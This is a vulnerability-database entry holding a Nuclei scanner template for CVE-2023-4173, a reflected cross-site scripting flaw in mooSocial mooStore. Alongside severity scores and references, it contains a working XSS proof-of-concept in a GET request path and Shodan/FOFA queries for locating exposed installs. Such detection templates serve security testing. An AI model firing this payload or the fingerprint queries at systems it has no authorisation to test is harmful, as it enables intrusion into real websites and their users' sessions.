Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-4173
HistoryAug 15, 2023 - 4:37 p.m.

mooSocial 3.1.8 - Reflected XSS

2023-08-1516:37:28
ProjectDiscovery
github.com
12
cve2023
packetstorm
moosocial
xss
vulnerability
moostore
execution
scripts
context
browser

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5

Confidence

High

EPSS

0.003

Percentile

66.8%

A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.
id: CVE-2023-4173

info:
  name: mooSocial 3.1.8 - Reflected XSS
  author: momika233
  severity: medium
  description: |
    A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51670
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4173
    - http://packetstormsecurity.com/files/174016/mooSocial-3.1.8-Cross-Site-Scripting.html
    - https://vuldb.com/?ctiid.236208
    - https://vuldb.com/?id.236208
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4173
    cwe-id: CWE-79
    epss-score: 0.00189
    epss-percentile: 0.56249
    cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moosocial
    product: moostore
    shodan-query: http.favicon.hash:"702863115"
    fofa-query:
      - mooSocial
      - moosocial
      - icon_hash="702863115"
  tags: cve2023,cve,packetstorm,moosocial,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert('document.domain')>"
          - "mooSocial"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 404
# digest: 4a0a00473045022023cad3861adbf0bc6237e47f9f8191aeb6e2ecf983e5056216df00cb97e884ce022100be49e1f8630f7ac7b0023eb9bfa3f09d97b93f4edae687f5b9dd9c2bc2f05fcc:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5

Confidence

High

EPSS

0.003

Percentile

66.8%

Related for NUCLEI:CVE-2023-4173